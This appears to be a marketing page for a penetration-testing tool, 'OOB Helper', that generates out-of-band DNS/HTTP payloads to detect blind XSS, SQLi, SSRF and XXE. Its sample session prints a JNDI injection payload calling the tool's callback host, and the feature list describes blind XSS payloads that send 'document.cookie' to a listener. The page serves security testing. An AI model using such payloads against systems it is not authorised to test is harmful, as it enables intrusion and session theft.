OOB Helper

Blind Interaction Testing

Detect invisible vulnerabilities. OOB Helper generates payloads designed to trigger out-of-band network interactions (DNS/HTTP), allowing you to detect Blind XSS, Blind SQLi, and SSRF where no response is returned to the user.

Try OOB Helper Documentation

Vectors:Blind XSS, XXE, SSRF, OS Command

OOB Callbacks

> rasec interact --protocol dns

[+] Generated OOB Interaction Payload

Payload: ${jndi:dns://x4d9f.oob.rasec.dev/a}

Listener: https://oob.rasec.dev/monitor/x4d9f

[WAITING] Listening for callbacks...

[+] DNS Query received from 1.2.3.4

Query: a.x4d9f.oob.rasec.dev

Type: A (IPv4)

Time: 2023-10-25 10:45:12

Key Features

Interaction Payloads

Generates unique callback URLs for DNS and HTTP tracking.

Blind XSS

Payloads that grab "document.cookie" and send it to your listener.

Protocol Support

Supports tailored payloads for XXE, SSRF, and OS Command Injection.

Ready to try OOB Helper?

Start using this tool in seconds. No credit card required.

Launch OOB Helper

All Tools Try Live Demo